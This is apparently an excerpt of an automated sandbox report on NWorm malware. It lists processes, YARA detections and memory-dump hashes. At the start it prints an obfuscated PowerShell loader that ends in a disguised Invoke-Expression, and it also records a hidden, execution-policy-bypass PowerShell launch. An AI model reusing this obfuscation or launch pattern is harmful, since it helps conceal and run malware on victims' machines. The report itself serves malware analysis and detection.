^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X
                                                                    Imagebase:0x7ff619710000
                                                                    File size:447488 bytes
                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.951681461.000001EE654E3000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.951692197.000001EE654E7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.952998329.000001EE745BD000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:20:26:15
                                                                    Start date:08/03/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff77f440000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:10
                                                                    Start time:20:26:50
                                                                    Start date:08/03/2022
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
                                                                    Imagebase:0x7ff619710000
                                                                    File size:447488 bytes
                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000A.00000002.943052838.000001A63E9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:11
                                                                    Start time:20:27:05
                                                                    Start date:08/03/2022
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                    Imagebase:0xe20000
                                                                    File size:55400 bytes
                                                                    MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:moderate

                                                                    Reset < >
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.955148529.00007FF9ECF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ecf40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 86-t$@6-t$gRK$gRK$gRK$gRK
                                                                      • API String ID: 0-2060218735
                                                                      • Opcode ID: 7c7df6a06e1921498d25adec3af2cd433187605c6b8b867ed5b43e3b5f85a4c2
                                                                      • Instruction ID: 54b9346c1f43c778f00e1c5c11b3d1ab492b63eeed17e92cfa4d3f4171b74eb8
                                                                      • Opcode Fuzzy Hash: 7c7df6a06e1921498d25adec3af2cd433187605c6b8b867ed5b43e3b5f85a4c2
                                                                      • Instruction Fuzzy Hash: 41E1F43290DB866FE79A972A58557F47FE1EF46220B0804FAD09DC71E3DD68AC09C352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.955148529.00007FF9ECF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ecf40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 86-t$gRK$gRK
                                                                      • API String ID: 0-1583634640
                                                                      • Opcode ID: 13eaf976a2096642fd8a1f80571e6df54af92669bcf8acb3f41a1f90c1783eab
                                                                      • Instruction ID: ea4a5da4d0b39e576f9e582de29898123c257b27d841fff7ffabcbcd430ed321
                                                                      • Opcode Fuzzy Hash: 13eaf976a2096642fd8a1f80571e6df54af92669bcf8acb3f41a1f90c1783eab
                                                                      • Instruction Fuzzy Hash: 64315532E0EA862BF7A9E32A14157F469C2EF81710B4844FED48DC32E3DC6DBC158256
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H$h
                                                                      • API String ID: 0-3056009747
                                                                      • Opcode ID: 57c402642334c5f861797b742fbcf58ff738c5ee16954bd19052cd4855d676ce
                                                                      • Instruction ID: 31761e80b6564cc0ba7c2aa9ab8f0f1a8673cd8b2eab54f349aa4cbe0c651e43
                                                                      • Opcode Fuzzy Hash: 57c402642334c5f861797b742fbcf58ff738c5ee16954bd19052cd4855d676ce
                                                                      • Instruction Fuzzy Hash: A702C030A0CA498FDB85EF58C495BA97BE1FF69310F1441AED08DD7296CA64FC42CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X
                                                                      • API String ID: 0-2476457703
                                                                      • Opcode ID: 0c2a7d274845537ab7fe47e52c52a8a912a685e94ec651b858931a77c1ce9c85
                                                                      • Instruction ID: 7adf0f0390c103ea819daf513c3aea64e320591e678552b63e80efd0db1abb53
                                                                      • Opcode Fuzzy Hash: 0c2a7d274845537ab7fe47e52c52a8a912a685e94ec651b858931a77c1ce9c85
                                                                      • Instruction Fuzzy Hash: 84E1D131A0CA494FEB86DF1C8499BE97BE1FF69310F14417AD08DE7296CA64BC41CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: nd_H
                                                                      • API String ID: 0-4031231209
                                                                      • Opcode ID: db1fac31686713a1ad1f9a4df4781349d64d41ce53dc6e35bb35277f7aa49676
                                                                      • Instruction ID: 0f97cce5df8498bc21308517b0f11d66789eeb3086b2af92730e11021a67bf46
                                                                      • Opcode Fuzzy Hash: db1fac31686713a1ad1f9a4df4781349d64d41ce53dc6e35bb35277f7aa49676
                                                                      • Instruction Fuzzy Hash: 71E18F31A0CA498FDB85EF5CC499BE97BE1FF69300F1441AAD48CD7296CA64EC41CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #b_^
                                                                      • API String ID: 0-1767964138
                                                                      • Opcode ID: 955a6de26fd9f03f17b52af9373d7f2b0bbd100ba5064699168c54aae356fda3
                                                                      • Instruction ID: 04c3852eca635355623a8369f6d7777af25d24d15c0ce858437c60ba3e37ac48
                                                                      • Opcode Fuzzy Hash: 955a6de26fd9f03f17b52af9373d7f2b0bbd100ba5064699168c54aae356fda3
                                                                      • Instruction Fuzzy Hash: 1731C13250C7594FD705EB18E8916DABBE0FF96364F04017BE0CCD7152DA64A944CBD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: af2a5d8bbad07d044f600935f78ac337346a337d4f7323b810aba0537b32cde7
                                                                      • Instruction ID: efcf413fd373f9603d114104a5b42571fad4f63c66f58bcdb641df59a5ef5932
                                                                      • Opcode Fuzzy Hash: af2a5d8bbad07d044f600935f78ac337346a337d4f7323b810aba0537b32cde7
                                                                      • Instruction Fuzzy Hash: C201B53270CB494BEB48EA1CD8867B473D1DB55325B04007EE5CAC3196D826FC468B85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 590332ab3b5c8c9eb5adecd5d821e1dfadcd43207645f8be2bfff624818fc1f7
                                                                      • Instruction ID: 9d3b74e7088aa8bd04bfdf500dc0b3824ffc552e2cfed4340a7ae9923907181a
                                                                      • Opcode Fuzzy Hash: 590332ab3b5c8c9eb5adecd5d821e1dfadcd43207645f8be2bfff624818fc1f7
                                                                      • Instruction Fuzzy Hash: 21F1C33090CA4D8FDB85EF58C449BA97BE1FF69300F1441AAD48DD7296CA64FC82CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09ec771f04b07412303b5835dd5c973ab3442208fbe6f91d56ccfc4b141c51c6
                                                                      • Instruction ID: 6083d8119908b1c80d995872b8301e844e796f27cfcfa6481d2217dbd3079cc8
                                                                      • Opcode Fuzzy Hash: 09ec771f04b07412303b5835dd5c973ab3442208fbe6f91d56ccfc4b141c51c6
                                                                      • Instruction Fuzzy Hash: DAC1083190C7865FE749EB28D4996E17BE0EF56314B1401BED0C9C72A3DA65BC42C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d49d4d877ab96660bd7b46589c26ff7ff76e862fba923b8cfd022e945dc5c31f
                                                                      • Instruction ID: e5ec172efdcbf3b5d2fc9980516e2ca45cc6206874909518e03adf119b57008c
                                                                      • Opcode Fuzzy Hash: d49d4d877ab96660bd7b46589c26ff7ff76e862fba923b8cfd022e945dc5c31f
                                                                      • Instruction Fuzzy Hash: 10A14C31E08A4D8FDB85EF58C488BA9B7E1FF58310F144169E88DE7295CA74EC41CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e71af7bcc304995e1268ea93a400ee3a859912cbede1ca15baef6330d1c2a6b5
                                                                      • Instruction ID: fa402cac27a7a91c207b486ee177aaff82ec5e6ab4f2b9774a63a7cad075309f
                                                                      • Opcode Fuzzy Hash: e71af7bcc304995e1268ea93a400ee3a859912cbede1ca15baef6330d1c2a6b5
                                                                      • Instruction Fuzzy Hash: 5021B23011CB498FD74AEF18D0957BAB7E0EF96310F10056EE0CEC71A2EA26A842C702
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08b42b5815334f6a3f5f29a8fbe707858e0c199bda32944ce40f4dfda0b58d06
                                                                      • Instruction ID: 8b3d9a67afd7a76f2d87d2c271fe73715c8b8acc2ab4243f840724dac23bc943
                                                                      • Opcode Fuzzy Hash: 08b42b5815334f6a3f5f29a8fbe707858e0c199bda32944ce40f4dfda0b58d06
                                                                      • Instruction Fuzzy Hash: C3F0547271CB444FDB9CEA1CE44597973D1EBD5334F10052EF0CFC26A6DA26E8428646
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bffc68052842c414c11cdc75b3144f6442cbfbb98ca023f6752489945e858fe5
                                                                      • Instruction ID: 4f19209842ab22aed6ecbe2dfcd8ac278024ae037a5c3b0f1dcae736a5e4e007
                                                                      • Opcode Fuzzy Hash: bffc68052842c414c11cdc75b3144f6442cbfbb98ca023f6752489945e858fe5
                                                                      • Instruction Fuzzy Hash: 14F0A03271C6044FDB4CAA1CF8429B473D1EB8A320B00002EE48FC2296E927F8428682
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe398c9852fd900e03424bbc46431a4e2f832e3e1b5f6df814e2b8e54f2c5cd4
                                                                      • Instruction ID: e19ecb98f01b0b8101409bac06ef0934fccf22ecd8c6bff801b3fbee81e41608
                                                                      • Opcode Fuzzy Hash: fe398c9852fd900e03424bbc46431a4e2f832e3e1b5f6df814e2b8e54f2c5cd4
                                                                      • Instruction Fuzzy Hash: 79F0373275C6044FDB4CAA1CF4425B573D1E799325B00417FF4CFC2596D917E842C685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91106741570f5fbc909b5b7afce4f3919f95e28306103fecc2863a5851a0b9cf
                                                                      • Instruction ID: b4627c5510929b855ad5e468573082ac947807e69c041570179da4b76f237489
                                                                      • Opcode Fuzzy Hash: 91106741570f5fbc909b5b7afce4f3919f95e28306103fecc2863a5851a0b9cf
                                                                      • Instruction Fuzzy Hash: CAE0923271C9084BDB08BB1DF4859B5B3C1EB95334754826BD40EC7256DD29EC828780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab6bdc5587e5b89bcd3d5333621651b058964d9d5122190c5c4374fa2eb31766
                                                                      • Instruction ID: deb05f1aa15858b1026a89569ab3ab54a8b4d64615c15b9c6e378b6fd270aca2
                                                                      • Opcode Fuzzy Hash: ab6bdc5587e5b89bcd3d5333621651b058964d9d5122190c5c4374fa2eb31766
                                                                      • Instruction Fuzzy Hash: 1EB15931A0CA4A8FE72ADB18D489771B7E0FF45310B1485BEC4CEC7296DAA5BC42C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951524375.00007FF9ECF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ecf50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X#QK$gRK$gRK$gRK$gRK$gRK$gRK$gRK$gRK
                                                                      • API String ID: 0-392750035
                                                                      • Opcode ID: 08a8bb6789ec0e954094f1703157f5b89ad5be1fb64776c709739001f8c11d11
                                                                      • Instruction ID: 10eca0f226d259bd34d1d16ebb97ffecc3b737b02edfd3dc58b1c01e02b43f17
                                                                      • Opcode Fuzzy Hash: 08a8bb6789ec0e954094f1703157f5b89ad5be1fb64776c709739001f8c11d11
                                                                      • Instruction Fuzzy Hash: 71123A21A0DB860FE799D76C58167B57BD2EF46210B0805BED58DC72A3DD68FC0AC392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951524375.00007FF9ECF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ecf50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$I$H4!I$x,QK$gRK$gRK$gRK
                                                                      • API String ID: 0-2751461112
                                                                      • Opcode ID: 95c3a63ae0925f883789b740294311b6299bb940b21b482abcfaf902d61899f6
                                                                      • Instruction ID: 33528d3db6487104df69af0f58bca6fd9968e492f4ae8a01bc7f1c9f33e3a7b7
                                                                      • Opcode Fuzzy Hash: 95c3a63ae0925f883789b740294311b6299bb940b21b482abcfaf902d61899f6
                                                                      • Instruction Fuzzy Hash: DAE1D16290DBC60FE79AD72C58152B57FD1EF56220B0805BED189C72A3DD68FC0AC362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951524375.00007FF9ECF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ecf50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X#QK$gRK$gRK
                                                                      • API String ID: 0-3124488172
                                                                      • Opcode ID: 4febdc970853ce2a4167d4e1cb4b4ebd2bcafe19b9accc085244c781b06685a6
                                                                      • Instruction ID: f45d41525694b754664e65b6a61ed93fd27c7d99376a10769ab13b5c076da62d
                                                                      • Opcode Fuzzy Hash: 4febdc970853ce2a4167d4e1cb4b4ebd2bcafe19b9accc085244c781b06685a6
                                                                      • Instruction Fuzzy Hash: 90214621B0DF0A0FF7A8E22D14157B4A6C3EF85314B0844BAD68DC33A7DD28FC0A8242
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
